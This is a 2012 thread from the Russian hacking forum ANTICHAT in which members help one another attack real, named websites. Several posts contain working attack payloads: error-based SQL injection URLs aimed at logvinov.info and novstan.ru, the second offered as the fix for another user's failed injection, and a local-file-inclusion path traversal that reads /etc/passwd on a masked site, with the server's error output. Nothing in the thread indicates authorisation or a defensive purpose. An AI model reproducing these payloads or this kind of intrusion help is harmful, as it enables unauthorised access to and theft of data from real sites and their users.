ANTICHAT Forum
HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
НОВЫЕ ТОРГОВАЯ НОВОСТИ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 02.07.2012, 19:26
loskstyle
Новичок
Регистрация: 02.07.2012
Сообщений: 1
С нами: 7296086

Репутация: 0
По умолчанию

Цитата:
Сообщение от None  
Вроде в WSO есть... не?
Но работает он только в версии с "suid".
 
Ответить с цитированием

  #2  
Старый 03.07.2012, 00:16
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 0
С нами: 10992741

Репутация: 0
По умолчанию

Del msg
 
Ответить с цитированием

  #3  
Старый 03.07.2012, 00:32
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 0
С нами: 10992741

Репутация: 0
По умолчанию

Del msg
 
Ответить с цитированием

  #4  
Старый 03.07.2012, 00:41
pirat0
Познающий
Регистрация: 16.01.2011
Сообщений: 71
С нами: 8063606

Репутация: -1
По умолчанию

Цитата:
Сообщение от Zed0x  
Эмммм, в верху страницы на пол страницы)))
сори у меня чет в мозиле не было хз почему ))

а в хроме есть
 
Ответить с цитированием

  #5  
Старый 03.07.2012, 11:16
ZARO
Познающий
Регистрация: 17.04.2009
Сообщений: 59
С нами: 8982831

Репутация: 37
По умолчанию

Цитата:
Сообщение от Zed0x  
Помогите подобрать колонки. При постановки ковычки вылизает ошибка базу, но почему то не получается:
http://logvinov.info/about/0/0/0/1'or(1,2)=(select*from(select(name_const(version() ,1)),name_const(version(),1))a)and(1)='1
 
Ответить с цитированием

  #6  
Старый 03.07.2012, 11:36
Rootz
Новичок
Регистрация: 01.07.2012
Сообщений: 22
С нами: 7297526

Репутация: 0
По умолчанию

ребят, извиняюсь за жутко странный вопрос, но не мог бы кто объяснить, как искать sql-injection в ручную? ) подробных faq не видел, желательно человек чтобы ) если согласен кто помочь начинающему, отпишите пожалуйста в пм свою icq\jabber
 
Ответить с цитированием

  #7  
Старый 03.07.2012, 14:02
.Varius
Banned
Регистрация: 05.05.2009
Сообщений: 1,334
С нами: 8957186

Репутация: 796


По умолчанию

Цитата:
Сообщение от Rootz  
ребят, извиняюсь за жутко странный вопрос, но не мог бы кто объяснить, как искать sql-injection в ручную? ) подробных faq не видел, желательно человек чтобы ) если согласен кто помочь начинающему, отпишите пожалуйста в пм свою icq\jabber
Основы тут. Далее сам сообразишь, нужны начальные знания синтаксиса СУБД.
 
Ответить с цитированием

  #8  
Старый 03.07.2012, 14:37
MaxFast
Постоянный
Регистрация: 12.10.2011
Сообщений: 569
С нами: 7676246

Репутация: 94


По умолчанию

Нашел на неком сайте LFI

Код:
http://******.ru/book_php.php?id=adminpidaras.php
Пытаюсь крутить

Код:
http://******.ru/book_php.php?id=../../../../../../../../../../../../../../../../../../../etc/passwd
Цитата:
Сообщение от None  
Warning: include(): open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s): (/var/www/******/data:.) in /var/www/******/data/www/******.ru/book_php.php on line 387 Warning: include(/etc/passwd): failed to open stream: Operation not permitted in /var/www/******/data/www/******.ru/book_php.php on line 387 Warning: include(): Failed opening 'books/PHP/../../../../../../../../../../../../../../../../../../../etc/passwd' for inclusion (include_path='.:/usr/share/pear:/usr/share/php') in /var/www/******/data/www/******.ru/book_php.php on line 387
Поставляю %00, и все-равно ошибка.

Подскажите что я делаю не так?
 
Ответить с цитированием

  #9  
Старый 03.07.2012, 14:54
Melfis
Постоянный
Регистрация: 25.04.2011
Сообщений: 505
С нами: 7921046

Репутация: 53


По умолчанию

Цитата:
Сообщение от None  
Warning: include(): open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s)
нулл-байт тут не при чём. В самом конфиге апача прописано куда можно ходить.
 
Ответить с цитированием

  #10  
Старый 03.07.2012, 19:08
Expl0ited
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами: 8328566

Репутация: 935


По умолчанию

Цитата:
Сообщение от Nightmarе  
Не могу раскрутить никак:
http://www.novstan.ru/search/?str=ass'
Как мне кажется, там запрос типа select * from search where ass like '%$_GET[str]%'
Но никак не получается текущий запрос перекрыть, чтобы свой выполнить, делал так:
ass'), ass%'), ass%')) и так далее, но видимо кардинально не то делаю, просьба помочь кто может.
Код:
http://www.novstan.ru/search/?str=%')or(1)group%2F%2A%2A%2Fby(concat(version(),0x00,floor(rand(0)*2)))having(min(0)or(1))%23
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 5 (пользователей: 0 , гостей: 5)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.